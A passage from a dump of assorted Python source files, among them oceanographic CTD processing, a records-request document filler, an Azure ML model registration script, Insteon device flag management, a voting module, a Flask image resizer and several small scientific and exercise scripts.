True: # Butter is closer to what SBE is doing with their cosine filter.\n Wn = (1. / time_constant) / (sample_rate * 2.)\n b, a = signal.butter(2, Wn, 'low')\n data = signal.filtfilt(b, a, data)\n\n return data\n\n\ndef cell_thermal_mass(temperature, conductivity):\n \"\"\"\n Sample interval is measured in seconds.\n Temperature in degrees.\n CTM is calculated in S/m.\n\n \"\"\"\n\n alpha = 0.03 # Thermal anomaly amplitude.\n beta = 1. / 7 # Thermal anomaly time constant (1/beta).\n\n sample_interval = 1 / 15.\n a = 2 * alpha / (sample_interval * beta + 2)\n b = 1 - (2 * a / alpha)\n dCodT = 0.1 * (1 + 0.006 * [temperature - 20])\n dT = np.diff(temperature)\n ctm = -1.0 * b * conductivity + a * (dCodT) * dT # [S/m]\n return ctm\n\n\ndef press_check(self, column='index'):\n \"\"\"\n Remove pressure reversals.\n\n \"\"\"\n data = self.copy()\n if column != 'index':\n press = data[column]\n else:\n press = data.index.values.astype(float)\n\n ref = press[0]\n inversions = np.diff(np.r_[press, press[-1]]) < 0\n mask = np.zeros_like(inversions)\n for k, p in enumerate(inversions):\n if p:\n ref = press[k]\n cut = press[k + 1:] < ref\n mask[k + 1:][cut] = True\n data[mask] = np.NaN\n return data\n\n\ndef bindata(self, delta=1., method='averaging'):\n \"\"\"\n Bin average the index (usually pressure) to a given interval (default\n delta = 1).\n\n Note that this method does not drop NA automatically. Therefore, one can\n check the quality of the binned data.\n\n \"\"\"\n if method == 'averaging':\n start = np.floor(self.index[0])\n end = np.ceil(self.index[-1])\n shift = delta / 2. # To get centered bins.\n new_index = np.arange(start, end, delta) - shift\n new_index = Index(new_index)\n newdf = self.groupby(new_index.asof).mean()\n newdf.index += shift # Not shifted.\n else:\n newdf = self.copy()\n\n return newdf\n\n\ndef split(self):\n \"\"\"Returns a tuple with down/up-cast.\"\"\"\n down = self.iloc[:self.index.argmax()]\n up = self.iloc[self.index.argmax():][::-1] # Reverse up index.\n return down, up\n\n\ndef movingaverage(series, window_size=48):\n window = np.ones(int(window_size)) / float(window_size)\n return Series(np.convolve(series, window, 'same'), index=series.index)\n\n\ndef smooth(self, window_len=11, window='hanning'):\n \"\"\"Smooth the data using a window with requested size.\"\"\"\n\n windows = {\n 'flat': np.ones,\n 'hanning': np.hanning,\n 'hamming': np.hamming,\n 'bartlett': np.bartlett,\n 'blackman': np.blackman\n }\n data = self.values.copy()\n\n if window_len < 3:\n return Series(data, index=self.index, name=self.name)\n\n if window not in list(windows.keys()):\n raise ValueError(\"\"\"window must be one of 'flat', 'hanning',\n 'hamming', 'bartlett', 'blackman'\"\"\")\n\n s = np.r_[2 * data[0] - data[window_len:1:-1], data, 2 *\n data[-1] - data[-1:-window_len:-1]]\n\n w = windows[window](window_len)\n\n data = np.convolve(w / w.sum(), s, mode='same')\n data = data[window_len - 1:-window_len + 1]\n return Series(data, index=self.index, name=self.name)\n\n\ndef mixed_layer_depth(CT, method='half degree'):\n if method == 'half degree':\n mask = CT[0] - CT < 0.5\n else:\n mask = np.zeros_like(CT)\n return Series(mask, index=CT.index, name='MLD')\n\n\ndef barrier_layer_thickness(SA, CT):\n \"\"\"\n Compute the thickness of water separating the mixed surface layer from the\n thermocline. A more precise definition would be the difference between\n mixed layer depth (MLD) calculated from temperature minus the mixed layer\n depth calculated using density.\n\n \"\"\"\n import gsw\n sigma_theta = gsw.sigma0(SA, CT)\n mask = mixed_layer_depth(CT)\n mld = np.where(mask)[0][-1]\n sig_surface = sigma_theta[0]\n sig_bottom_mld = gsw.sigma0(SA[0], CT[mld])\n d_sig_t = sig_surface - sig_bottom_mld\n d_sig = sigma_theta - sig_bottom_mld\n mask = d_sig < d_sig_t # Barrier layer.\n return Series(mask, index=SA.index, name='BLT')\n\n\ndef derive_cnv(self):\n \"\"\"Compute SP, SA, CT, z, and GP from a cnv pre-processed cast.\"\"\"\n import gsw\n cast = self.copy()\n p = cast.index.values.astype(float)\n cast['SP'] = gsw.SP_from_C(cast['c0S/m'].values * 10.,\n cast['t090C'].values, p)\n cast['SA'] = gsw.SA_from_SP(cast['SP'].values, p, self.lon, self.lat)\n cast['SR'] = gsw.SR_from_SP(cast['SP'].values)\n cast['CT'] = gsw.CT_from_t(cast['SA'].values, cast['t090C'].values, p)\n cast['z'] = -gsw.z_from_p(p, self.lat)\n cast['sigma0_CT'] = gsw.sigma0(cast['SA'].values, cast['CT'].values)\n return cast\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"ctd/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"638591144","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright © 2016 Ryan Kanno \n#\n# Distributed under terms of the MIT license.\n\nimport datetime\nfrom docx import Document\nimport os\n\n\ndef create_uipa_document_request_from_foi_request(foi_request):\n curr = os.path.dirname(os.path.realpath(__file__))\n return create_uipa_document_request(\n os.path.join(curr, 'data/Request-Access-form-12.1.15-fillable.docx'),\n datetime.datetime.utcnow(),\n foi_request.public_body.name,\n foi_request.public_body.email,\n foi_request.secret_address,\n foi_request.secret_address,\n foi_request.secret_address,\n foi_request.description,\n False)\n\n\ndef create_uipa_document_request(\n document_path,\n request_date,\n agency_name,\n agency_contact_information,\n requester_name,\n requester_contact_information,\n requester_email_address,\n request_text,\n should_waive_fees=False):\n\n # TODO: @ryankanno - Make case insensitive regexs at some point\n DELIMITER_REPLACEMENT_MAP = {\n \"[Request_Date]\": request_date.strftime('%m-%d-%Y'),\n \"[Agency_Name]\": agency_name,\n \"[Agency_Contact_Information]\": agency_contact_information,\n \"[Requester_Name]\": requester_name,\n \"[Requester_Contact_Information]\": requester_contact_information,\n \"[Requester_Email_Address]\": requester_email_address,\n \"[Request]\": request_text\n }\n\n document = Document(document_path)\n paragraphs = document.paragraphs\n\n for idx, paragraph in enumerate(paragraphs):\n for k, v in DELIMITER_REPLACEMENT_MAP.iteritems():\n if k in paragraph.text:\n paragraph.text = paragraph.text.replace(k, v)\n\n if \"[CB]\" in paragraph.text:\n paragraph.text = paragraph.text.replace(\n \"[CB]\",\n \"[X]\" if should_waive_fees else \"[ ]\")\n\n return document\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Testing, yo.\n \"\"\"\n document = create_uipa_document_request(\n './data/Request-Access-form-12.1.15-fillable.docx',\n datetime.datetime.utcnow(),\n \"Department of Development\",\n \"Ryan Kanno\",\n \"Sara Kanno\",\n \"sara@kanno.io\",\n \"sara@kanno.io\",\n \"Can I get access to code?\",\n False)\n\n document.save(\n './data/{0}-FALSE-Request-Access-form-12.1.15-fillable.docx'.format(\n datetime.datetime.utcnow().isoformat()))\n\n document = create_uipa_document_request(\n './data/Request-Access-form-12.1.15-fillable.docx',\n datetime.datetime.utcnow(),\n \"Department of Development\",\n \"Ryan Kanno\",\n \"Sara Kanno\",\n \"sara@kanno.io\",\n \"sara@kanno.io\",\n \"Can I get access to code?\",\n True)\n\n document.save(\n './data/{0}-TRUE-Request-Access-form-12.1.15-fillable.docx'.format(\n datetime.datetime.utcnow().isoformat()))\n\n# vim: fenc=utf-8\n# vim: filetype=python\n","sub_path":"uipa_org/theme/doc_utilities.py","file_name":"doc_utilities.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"24567716","text":"# Copyright (c) 2021 Microsoft\n# \n# This software is released under the MIT License.\n# https://opensource.org/licenses/MIT\n\nimport json\nfrom pathlib import Path\nfrom typing import Tuple\nimport logging\n\nimport click\nfrom azureml.core import Run, Experiment, Workspace\n\n# Retrieve the run, experiment and workspace\nrun = Run.get_context()\nexperiment: Experiment = run.experiment\nworkspace: Workspace = experiment.workspace\n\nMETADATA_JSON = \"metadata.json\"\nRECOMMENDATION_JSON = 'recommend.json'\n\ndef read_metadata(folder_path: str) -> dict:\n model_metadata_path = Path(folder_path)\n model_metadata_file = model_metadata_path / METADATA_JSON\n\n with open(model_metadata_file, 'r') as fo:\n metadata = json.load(fo)\n\n return metadata\n\ndef read_recommendation(folder_path: str) -> bool:\n recommendation_path = Path(folder_path)\n recommendation_file = recommendation_path / RECOMMENDATION_JSON\n\n with open(recommendation_file, 'r') as fo:\n recommendation = json.load(fo)\n\n return recommendation.get('register', False)\n\n\n@click.command(\n context_settings=dict(\n ignore_unknown_options=True,\n allow_extra_args=True,\n )\n)\n@click.option(\"--force\", type=bool, default=False,\n help=\"Force model registration\")\n@click.option(\"--skip\", type=bool, default=False,\n help=\"Skip model registration\")\n@click.option(\"--model-metadata\", required=True,\n type=click.Path(exists=True,\n file_okay=True,\n dir_okay=True),\n help=\"The folder where the model files are stored\")\n@click.option(\"--register-model-folder\", \"register_folder\", required=True,\n type=click.Path(exists=True,\n file_okay=True,\n dir_okay=True),\n help=\"The folder where the deploy indicator is stored\")\n@click.option(\"--model-name\", type=str)\ndef main(force: bool, skip: bool, model_metadata: str, register_folder: str, model_name: str):\n if force and skip:\n raise ValueError(\"Model registration cannot be both forced and skipped\")\n \n # Determine if the model should be registered\n if skip:\n print(\"Registration skipped\")\n register_recommended = False\n elif force:\n print(\"Model registration forced\")\n register_recommended = True\n else:\n register_recommended = read_recommendation(folder_path=register_folder)\n print(f\"Model Registration Is Recommended?: {register_recommended}\")\n \n\n # If model registration is recommended, then register the model\n if register_recommended:\n metadata = read_metadata(model_metadata)\n challenger_model_run = Run.get(workspace=workspace, run_id=metadata['run_id'])\n \n challenger_model_run.register_model(\n model_name, \n model_path=metadata['model_path']\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"modules/4-pipeline/register/register_model.py","file_name":"register_model.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"449113041","text":"import sys\nsys.stdin = open('4041_활주로 건설.txt', 'r')\n\nT = int(input())\n\nfor test_case in range(1, T+1):\n N, X = map(int, input().split()) #N: 행렬 크기 / X: 높이 1인 경사로의 길이\n land = []\n for ground in range(N):\n land.append(list(map(int, input().split())))\n#\n land_row = land\n land_column = []\n for i in range(N):\n land_column.append([row[i] for row in land])\n#\n\n#메커니즘 생각이 안됨\n # for i in range(N):\n # for j in range(N):\n # land_row[i][j]\n # land_column[i][j]","sub_path":"SSAFY/이전_Pycharm_lym-master/4041_활주로 건설.py","file_name":"4041_활주로 건설.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"179861259","text":"import csv\n\nimport numpy as np\n\n\nclass Groups:\n def __init__(self, g1, g2, g3, g4):\n self.final_labels = []\n\n self.g1_data = []\n self.g2_data = []\n self.g3_data = []\n self.g4_data = []\n\n self.combined_data = []\n self.final_data = []\n\n self.final_x = []\n self.final_y = []\n self.final_z = []\n\n self.obtain_data(g1)\n self.obtain_data(g2)\n self.obtain_data(g3)\n self.obtain_data(g4)\n\n # print(self.g1_data)\n # print(self.g2_data)\n # print(self.g3_data)\n # print(self.g4_data)\n self.format_data()\n # print(self.final_data)\n\n\n def obtain_data(self, fileName):\n with open(fileName) as f:\n so = csv.reader(f, delimiter=',', quotechar='\"')\n so = list(so)\n # add all the data to their respective array\n label = \"\"\n # add label to the end\n if(fileName == \"G1.csv\"):\n label = \"g1\"\n self.g1_data = [list(map(int, i)) for i in so]\n self.combined_data.append(self.g1_data)\n elif (fileName == \"G2.csv\"):\n label = \"g2\"\n self.g2_data = [list(map(int, i)) for i in so]\n self.combined_data.append(self.g2_data)\n elif (fileName == \"G3.csv\"):\n label = \"g3\"\n self.g3_data = [list(map(int, i)) for i in so]\n self.combined_data.append(self.g3_data)\n elif (fileName == \"G4.csv\"):\n label = \"g4\"\n self.g4_data = [list(map(int, i)) for i in so]\n self.combined_data.append(self.g4_data)\n\n # split up the data into x, y, and z arrays\n for i in range(0, len(so)):\n self.final_x.append(int(so[i][0]))\n self.final_y.append(int(so[i][1]))\n self.final_z.append(int(so[i][2]))\n self.final_labels.append(label)\n\n def format_data(self):\n for i in range (0, len(self.combined_data)):\n for j in range(0, len(self.combined_data[i])):\n self.final_data.append(self.combined_data[i][j])\n","sub_path":"groupSeparation.py","file_name":"groupSeparation.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"616089690","text":"\"\"\"Manage getting an operating flag.\"\"\"\nimport asyncio\nimport logging\nfrom collections import namedtuple\n\nfrom ..address import Address\nfrom ..constants import ResponseStatus\nfrom ..handlers.to_device.get_operating_flags import GetOperatingFlagsCommand\nfrom ..handlers.to_device.set_operating_flags import SetOperatingFlagsCommand\nfrom ..utils import multiple_status\n\nOperatingFlagInfo = namedtuple(\"FlagInfo\", \"name group bit set_cmd unset_cmd\")\n_LOGGER = logging.getLogger(__name__)\nMAX_RETRIES = 5\n\n\nclass GetSetOperatingFlagsManager:\n \"\"\"Manager to get operating flags.\"\"\"\n\n def __init__(self, address: Address, op_flags):\n \"\"\"Init the GetOperatingFlagsManager class.\"\"\"\n self._address = Address(address)\n self._op_flags = op_flags\n self._groups = {}\n self._flags = {}\n self._get_command = GetOperatingFlagsCommand(self._address)\n self._set_command = SetOperatingFlagsCommand(self._address)\n self._get_command.subscribe(self._update_flags)\n self._send_lock = asyncio.Lock()\n self._extended_write = False\n self._set_command.subscribe(self._check_write_response)\n\n @property\n def extended_write(self):\n \"\"\"Return if an extended message is required.\"\"\"\n return self._extended_write\n\n @extended_write.setter\n def extended_write(self, value: bool):\n \"\"\"Set the extended write flag.\"\"\"\n self._extended_write = bool(value)\n\n def subscribe(self, name, group, bit, set_cmd, unset_cmd):\n \"\"\"Subscribe to updates.\"\"\"\n flag_info = OperatingFlagInfo(name, group, bit, set_cmd, unset_cmd)\n if self._groups.get(group) is None:\n self._groups[group] = {}\n if bit is not None:\n self._groups[group][bit] = flag_info\n else:\n self._groups[group] = flag_info\n self._flags[name] = flag_info\n\n def unsubscribe(self, name):\n \"\"\"Remove a flag from updates.\"\"\"\n flag_info = self._flags.get(name)\n if flag_info:\n group = flag_info.group\n bit = flag_info.bit\n self._remove(name, group, bit)\n\n def _remove(self, name, group, bit=None):\n try:\n if bit is not None:\n self._groups[group].pop(bit)\n else:\n self._groups.pop(group)\n except KeyError:\n pass\n\n try:\n self._flags.pop(name)\n except KeyError:\n pass\n\n async def async_read(self, group=None):\n \"\"\"Get the operating flags.\"\"\"\n results = []\n if group is None:\n for curr_group in self._groups:\n result = await self._async_read(curr_group)\n results.append(result)\n return multiple_status(*results)\n return await self._async_read(group)\n\n async def _async_read(self, group):\n retries = 0\n result = ResponseStatus.UNSENT\n while retries < MAX_RETRIES and result != ResponseStatus.SUCCESS:\n result = await self._get_command.async_send(group)\n retries += 1\n return result\n\n async def async_write(self):\n \"\"\"Set the operating flags.\"\"\"\n results = []\n for name in self._op_flags:\n if self._op_flags[name].is_dirty:\n flat_info = self._flags[name]\n result = await self._async_write(flat_info)\n results.append(result)\n return multiple_status(*results)\n\n async def _async_write(self, flag_info):\n flag = self._op_flags[flag_info.name]\n should_set = not flag.new_value if flag.is_reversed else flag.new_value\n cmd = flag_info.set_cmd if should_set else flag_info.unset_cmd\n if cmd is not None: # The operating flag is read only\n retries = 0\n result = ResponseStatus.UNSENT\n\n while retries < MAX_RETRIES and result != ResponseStatus.SUCCESS:\n result = await self._set_command.async_send(\n cmd=cmd, extended=self._extended_write\n )\n retries += 1\n\n if result == ResponseStatus.SUCCESS:\n flag.load(flag.new_value)\n return result\n # Reset the read only flag to original value\n flag.load(flag.value)\n return ResponseStatus.SUCCESS\n\n def _check_write_response(self, response):\n \"\"\"Confirm if the write command requires Standard or Extended messages.\n\n This is called when the command is responded to with a Direct NAK. The code in cmd2\n is returned in response.\n \"\"\"\n _LOGGER.debug(\"Received set command response: %s\", response)\n if response == 0xFD:\n self._extended_write = True\n\n def _update_flags(self, group, flags):\n \"\"\"Update each flag.\"\"\"\n if not self._groups.get(group):\n return\n\n if isinstance(self._groups[group], OperatingFlagInfo):\n flag_info = self._groups[group]\n flag = self._op_flags[flag_info.name]\n flag.load(flags)\n return\n\n for bit in self._groups[group]:\n flag_info = self._groups[group][bit]\n flag = self._op_flags[flag_info.name]\n value = bool(flags & 1 << flag_info.bit)\n flag.load(value)\n","sub_path":"pyinsteon/managers/get_set_op_flag_manager.py","file_name":"get_set_op_flag_manager.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"293931925","text":"#! /usr/bin/python\n\nimport matplotlib.pyplot as plt\n\nf = open(\"risultatiK8.txt\", \"r\")\n\nlines = f.readlines()\n\nxs = range(50, 250, 50)\n#xs = map(lambda x: x+50, xs)\n\n\narr1 = map(lambda x: float(x), lines[0].split())\nplt.plot(xs, arr1, label='Messaggi Inviati', marker='o')\n\narr2 = map(lambda x: float(x), lines[1].split())\nplt.plot(xs, arr2, label='Messaggi Ricevuti', marker='^')\n\narr3 = map(lambda x: float(x), lines[2].split())\nplt.plot(xs, arr3, label='Messaggi Scartati', marker='s')\n\n\nplt.title('grafico K=8')\nplt.grid(True)\nplt.xlim([50, 250])\nplt.xlabel('Numero nodi')\nplt.ylabel('Messaggi')\n\n\nplt.legend(loc='upper left')\n\nplt.show()\n\n","sub_path":"randomGossip/graficoK8.py","file_name":"graficoK8.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"566884943","text":"import numpy as np\r\nimport quadprog\r\n\r\ndef quadprog_solve_qp(P, q, G=None, h=None, A=None, b=None):\r\n qp_G = .5 * (P + P.T) # make sure P is symmetric\r\n qp_a = -q\r\n if A is not None:\r\n qp_C = -np.vstack([A, G]).T\r\n qp_b = -np.hstack([b, h])\r\n meq = A.shape[0]\r\n else: # no equality constraint\r\n qp_C = -G.T\r\n qp_b = -h\r\n meq = 0\r\n return quadprog.solve_qp(qp_G, qp_a, qp_C, qp_b, meq)[0 ]\r\n\r\nM = np.array([[1., 2., 0.], [-8., 3., 2.], [0., 1., 1.]])\r\nP = np.dot(M.T, M)\r\nq = np.dot(np.array([3., 2., 3.]), M).reshape((3,))\r\nG = np.array([[1., 2., 1.], [2., 0., 1.], [-1., 2., -1.]])\r\n\r\n## NOT DONE YET\r\n\r\n\r\nH = np.matrix( [[1,2], [3,4] ])\r\nf = np.array( [0,0] )\r\nA = np.matrix( [[-1,0], [0,-1]] )\r\nb = np.array( [-1,-1] )\r\n\r\nx = quadprog_solve_qp(P, q, G, h)\r\n\r\nprint(x)","sub_path":"Dell-Precision/Expts/Optimization/opt_qp2_scratch.py","file_name":"opt_qp2_scratch.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"192614839","text":"from collections import Counter\r\n\r\nfrom core.entities import Role\r\nfrom core.instance import votes, emperor, roles, claims\r\n\r\n# todo: read from json + read curr_cardinal id from redis\r\nn_cardinals = 9\r\nelectors = (\"CZ\", \"BB\", \"KL\", \"MN\", \"RH\", \"SX\", \"TE\")\r\ncardinals = ('car-{}'.format(i) for i in range(n_cardinals))\r\n\r\n\r\ndef vote(roleId: str, vote: str):\r\n role: Role = roles.get(roleId)\r\n allvotes: dict = votes.get(role.vote_role)\r\n votingState = allvotes.pop('state')\r\n\r\n # 1) Check if vote is valid\r\n if not role or not role.vote_role:\r\n return False\r\n\r\n if role.vote_role == 'DE':\r\n # Check if there's an emperor\r\n emp = emperor.get()\r\n if emp:\r\n return False\r\n\r\n if votingState == 'vote':\r\n if roleId == 'IT':\r\n return False\r\n elif votingState == 'veto':\r\n if roleId != 'IT':\r\n return False\r\n else:\r\n return False\r\n elif role.vote_role == 'IT':\r\n if not votingState == 'vote':\r\n return False\r\n\r\n # Check if there's a pope already\r\n claim = claims.get(role.vote_role)\r\n\r\n if claim:\r\n return False\r\n\r\n # 2) submit vote\r\n votes.save(role.vote_role, roleId, vote)\r\n allvotes[roleId] = vote\r\n\r\n # 3) Get winner\r\n (winner, winnerCount), (_, runnerUpCount) = Counter(allvotes.values()).most_common(2)\r\n if winnerCount == runnerUpCount or winner == '-1':\r\n winner = None\r\n everyoneVoted = '-1' not in allvotes.values()\r\n\r\n # 4) Switch voting state conditionally\r\n if role.vote_role == 'DE':\r\n if votingState == 'vote':\r\n if everyoneVoted:\r\n if winner:\r\n # Propagate to veto state\r\n votes.save(role.vote_role, roleId, vote)\r\n votes.save(role.vote_role, 'state', 'veto')\r\n votes.save(role.vote_role, 'winner', winner)\r\n else:\r\n # Reset vote\r\n votes.delete()\r\n votes.save(role.vote_role, 'state', 'vote')\r\n votes.create(role.vote_role, electors, \"-1\")\r\n\r\n elif votingState == 'veto':\r\n if vote == 'Y':\r\n # the pope has accepted the new emperor\r\n votes.save(role.vote_role, 'state', '-1')\r\n # we do not save the pope's vote\r\n emperor.save(winner)\r\n\r\n # DEUS VULT\r\n else:\r\n # pope vetoed; reset vote (1.1)\r\n votes.delete()\r\n votes.create(role.vote_role, electors)\r\n votes.create(role.vote_role, 'state', 'vote')\r\n\r\n\r\n elif role.vote_role == 'IT':\r\n if everyoneVoted:\r\n if winner:\r\n # new pope has been elected. WHITE SMOKE\r\n votes.create(role.vote_role, 'state', '-1')\r\n\r\n # change role for cardinal\r\n fingerprint = claims.get(winner)\r\n claims.delete(winner)\r\n claims.create('IT', fingerprint)\r\n\r\n # End of voting 1)\r\n # ----------------\r\n else:\r\n # vote failed; reset vote (3)\r\n votes.delete()\r\n votes.save(role.vote_role, 'state', 'vote')\r\n votes.create(role.vote_role, cardinals, \"-1\")\r\n\r\n return allvotes\r\n","sub_path":"core/votes.py","file_name":"votes.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"426584766","text":"\"\"\"\n_common.py\n\nauxiliary functions for scripts\n\"\"\"\nimport pyart\nfrom ..components import RadarDisplay, LinkPlugins, SelectRegion\n\n\ndef _add_all_advanced_tools(menu):\n\n # add grafical starts\n menu.addComponent(LinkPlugins)\n menu.addComponent(RadarDisplay)\n menu.addComponent(SelectRegion)\n\n # add all plugins to grafical start\n try:\n from .. import plugins\n for plugin in plugins._plugins:\n menu.addComponent(plugin)\n except:\n import warnings\n warnings.warn(\"Loading Plugins Fail\")\n\n\ndef _parse_dir(DirIn):\n if DirIn is None: # avoid reference to path while building documentation\n DirIn = os.getcwd()\n return DirIn\n\nZlike = ['CZ', 'DZ', 'AZ', 'Z',\n 'dbz', 'DBZ', 'dBZ', 'DBZ_S', 'DBZ_K',\n 'reflectivity_horizontal', 'DBZH', 'corr_reflectivity']\n\n\ndef _parse_field(container, field):\n '''\n Hack to perform a check on reflectivity to make it work with\n a larger number of files as there are many nomenclature is the\n weather radar world.\n\n This should only occur upon start up with a new file.\n '''\n\n if field is None:\n field = pyart.config.get_field_name('reflectivity')\n if container is None:\n return field\n\n fieldnames = container.fields.keys()\n Zinfile = set(fieldnames).intersection(Zlike)\n\n if field not in fieldnames and len(Zinfile) > 0:\n field = Zinfile.pop()\n\n return field\n","sub_path":"artview/scripts/_common.py","file_name":"_common.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"610623463","text":"# 翻转一棵二叉树。 \n# \n# 示例: \n# \n# 输入: \n# \n# 4\n# / \\\n# 2 7\n# / \\ / \\\n# 1 3 6 9 \n# \n# 输出: \n# \n# 4\n# / \\\n# 7 2\n# / \\ / \\\n# 9 6 3 1 \n# \n# 备注: \n# 这个问题是受到 Max Howell 的 原问题 启发的 : \n# \n# 谷歌:我们90%的工程师使用您编写的软件(Homebrew),但是您却无法在面试时在白板上写出翻转二叉树这道题,这太糟糕了。 \n# Related Topics 树\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def invertTree1(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n if not root:\n return None\n left = self.invertTree1(root.left)\n right = self.invertTree1(root.right)\n root.left = right\n root.right = left\n return root\n\n def invertTree(self, root):\n if not root:\n return None\n queue = [root]\n while queue:\n curr = queue.pop()\n temp = curr.left\n curr.left = curr.right\n curr.right = temp\n if curr.left:\n queue.append(curr.left)\n if curr.right:\n queue.append(curr.right)\n return root\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"leetcode/editor/cn/[226]翻转二叉树.py","file_name":"[226]翻转二叉树.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"193522462","text":"from io import BytesIO\nfrom flask import Flask, send_file\nfrom PIL import Image\n\napp = Flask(__name__)\n\n'''\nFor something real, I would have used a more elegant URL structure.\nIn general, these kinds of arguments tend to go in the query, not the path.\nHowever, for code simplicity, using Flask's built in named path parameters seemed optimal.\n'''\n@app.route('///')\ndef index(image_file, width, height):\n # Load a Pillow Image from the specified file\n image = Image.open('static/' + image_file)\n\n # Resize to provided dimensions\n resized_image = image.resize((width, height))\n\n # In memory byte stream so we dont have to save a temp file\n image_io = BytesIO()\n\n # We need the file extension to determe the format for saving the image\n file_extension = image_file.split('.')[-1]\n\n # Save the resized image to the byte stream with the original file's format\n # Note: Pillow requires format \"jpeg\" and not \"jpg\"\n resized_image.save(image_io, 'jpeg' if file_extension == 'jpg' else file_extension)\n\n # Reset the stream seek to the beginning so send_file can return something other than a spent stream\n image_io.seek(0)\n\n # Flask builtin helper to send files. Instead, we send a bytestream with an image mimetype\n return send_file(image_io, mimetype='image/' + file_extension)\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"364479780","text":"import numpy as np\nfrom scipy.interpolate import splrep, splev\nimport matplotlib.pyplot as plt\n\npp6770 = np.transpose(np.loadtxt('postproc/exprs_averaged_s06770.dat'))\npp0000 = np.transpose(np.loadtxt('input_profiles.dat'))\n\ndpsi = pp0000[0][1] - pp0000[0][0]\n\npsi = pp6770[0]\npsi0 = pp0000[0]\nT = pp6770[1]\nT0 = pp0000[5]\ndT0_dpsi = pp0000[6]\nDperp0 = pp0000[9]\n\nsmoothing = 0.000000000005\ntck = splrep(psi, T, s=smoothing)\ntck0 = splrep(psi0, T0, s=smoothing)\ntck0_dT0_dpsi = splrep(psi0, dT0_dpsi, s=smoothing)\ntck0_Dperp0 = splrep(psi0, Dperp0, s=smoothing)\n\npsi_int = np.arange(0, 1.0, dpsi)\npsi0_int = np.arange(0, 1.0, dpsi)\nT_int = splev(psi_int, tck, der=0)\nT0_int = splev(psi0_int, tck0, der=0)\ndT0_dpsi_int = splev(psi0_int, tck0_dT0_dpsi, der=0)\nDperp0_int = splev(psi0_int, tck0_Dperp0, der=0)\ndT_dpsi_int = splev(psi_int, tck, der=1)\n\nmodifier = dT_dpsi_int / (dT0_dpsi_int)\nDperp_new = modifier * Dperp0_int\n\n#plt.plot(pp0000[0], pp0000[5], 'g', psi_int, T_int, 'r', psi_int, dT_dpsi_int, 'b')\n#plt.show()\n\n#modifier = dT_dpsi / (dT_dpsi + dT_dpsi0)\n#Dperp = pp0000[9]\n#Dperp_new = modifier*Dperp\n\n#plt.plot(psi0_int, Dperp0_int, 'g', psi0_int, Dperp_new, 'r')\n#plt.show()\n\nfull_psi_min=1.04\nfull_psi_max=1.20\nfull_psi = (full_psi_max-full_psi_min) * np.random.random_sample((20)) + full_psi_min\nfull_psi = np.append([full_psi_min, full_psi_max], full_psi)\nfull_psi = np.sort(full_psi)\n\nfull_Dperp = (np.arange(len(full_psi))).astype(float)\nfull_Dperp.fill(np.max(Dperp_new))\n\nfull_psi = np.append(psi_int, full_psi)\nfull_Dperp = np.append(Dperp_new, full_Dperp)\n\nsmoothen1 = 0\ntck_Dperp = splrep(full_psi, full_Dperp, s=smoothen1)\n\nfull_psi_int = np.arange(0, 1.2+dpsi, dpsi)\nfull_Dperp_int = splev(full_psi_int, tck_Dperp, der=0)\n\noutput = np.transpose(np.array((full_psi_int, full_Dperp_int)))\nnp.savetxt('Dperp_profile_NEW.dat', output, fmt=\"%g\")\n","sub_path":"scripts/analysis_modified.py","file_name":"analysis_modified.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"421313657","text":"\"\"\"\nPlots data and model for MB08310 with residuals (no fitting).\n\nFrom `Janczak et al. 2010, ApJ 711, 731\n`_.\n\n\"\"\"\nimport glob\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\n\nimport MulensModel as mm\n\n\n# Read in MB08310 data files (see data/MB08310) as MulensData objects.\n# Grabbing all data files in the MB08310 folder\nfiles = glob.glob(os.path.join(mm.DATA_PATH, \"photometry_files\",\n \"MB08310\", \"*.tbl\"))\n\ndatasets_default = []\nfor file_ in sorted(files):\n data = mm.MulensData(file_name=file_, comments=[\"\\\\\", \"|\"])\n datasets_default.append(data)\n\n# Define basic point lens model\nt_0 = 2454656.39975\nu_0 = 0.00300\nt_E = 11.14\nt_star = 0.05487\nplens_model = mm.Model({'t_0': t_0, 'u_0': u_0, 